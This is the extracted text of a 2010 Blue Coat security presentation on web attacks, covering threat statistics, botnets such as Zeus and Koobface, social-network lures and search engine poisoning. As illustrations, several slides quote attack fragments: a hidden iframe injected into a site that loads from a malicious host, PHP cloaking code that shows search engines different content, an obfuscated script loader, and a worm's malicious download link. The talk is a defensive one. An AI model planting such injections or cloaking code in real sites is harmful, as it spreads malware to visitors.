2010-11 The Anatomy of a Web Attack

2010-11 The Anatomy of a Web Attack
The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
Agenda  State of the Web • Top categories • Top attacks  The Anatomy of a Web Attack • Lures to web threats • Examples  Dynamic Link Analysis 2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Best of the Worst  Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity  Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc. 3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Email vs Social Networking  Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent. 4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Domain: Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36 Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Changing Web Habits Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams 6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Threats Rising Exponentially  2/3 of all known malicious code threats in 1 year (Symantec April’09)  1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky) 7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Distribution Power  Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010 8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
An Invitation to Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Multi-Host Pages SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds 11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Infected Site www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html> 13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks 14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… 15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Hijacked Website if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js 18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape('%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js 19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
What just happened? Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect 20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr 21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples – Fake Warez 22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
© Blue Coat Systems, Inc. 2010. All Rights Reserved.

Check these out next

2010-11 The Anatomy of a Web Attack

Recomendados

Mais conteúdo relacionado

Destaque(12)

Similar a 2010-11 The Anatomy of a Web Attack (20)

Mais de Raleigh ISSA(20)

Último(20)

2010-11 The Anatomy of a Web Attack